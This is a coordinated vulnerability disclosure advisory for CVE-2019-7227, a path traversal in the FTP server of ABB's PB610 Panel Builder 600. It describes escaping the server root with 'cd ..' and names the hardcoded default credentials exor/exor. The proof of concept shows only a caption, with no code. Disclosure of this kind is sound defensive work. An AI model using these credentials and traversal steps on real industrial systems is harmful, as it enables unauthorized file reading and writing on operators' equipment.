ABB IDAL FTP Server Path Traversal Vulnerability

17 June 2019

 

IDENTIFIERS   

 

 

CVE-2019-7227

ABBVU-IAMF-1902006

 

CVSS SCORE

 

7.3 (AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)

 

XID

 

XL-19-008

 

AFFECTED VENDORS

 

ABB (new.abb.com)

 

CREDIT

 

Eldar Marcussen - xen1thLabs - Software Labs

 

VULNERABILITY SUMMARY       

 

The IDAL FTP server fails to ensure that directory change requests do not change to locations outside of the FTP servers root directory. An authenticated attacker can simply traverse outside the server root directory by changing the directory with “cd ..”.

TECHNICAL DETAILS  

 

 

 

An authenticated attacker can traverse to arbitrary directories on the hard disk and then use the FTP server functionality to download and upload files. An unauthenticated attacker can take advantage of the hardcoded or default credential pair exor/exor to become an authenticated attacker.

 

PROOF OF CONCEPT

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

FTP session accessing files outside the FTP server root.

 

AFFECTED SYSTEMS 

  

PB610 Panel Builder 600, order code: 1SAP500900R0101, versions 1.91 … 2.8.0.367

 

SOLUTION 

 

 

 

 

Apply the patches and instructions from vendor:

- ABB PB610:

 

DISCLOSURE TIMELINE

 

 

 

04/02/2019 - Contacted ABB requesting disclosure coordination

05/02/2019 - Provided vulnerability details

05/06/2019 – Patch available

17/06/2019 – xen1thLabs public disclosure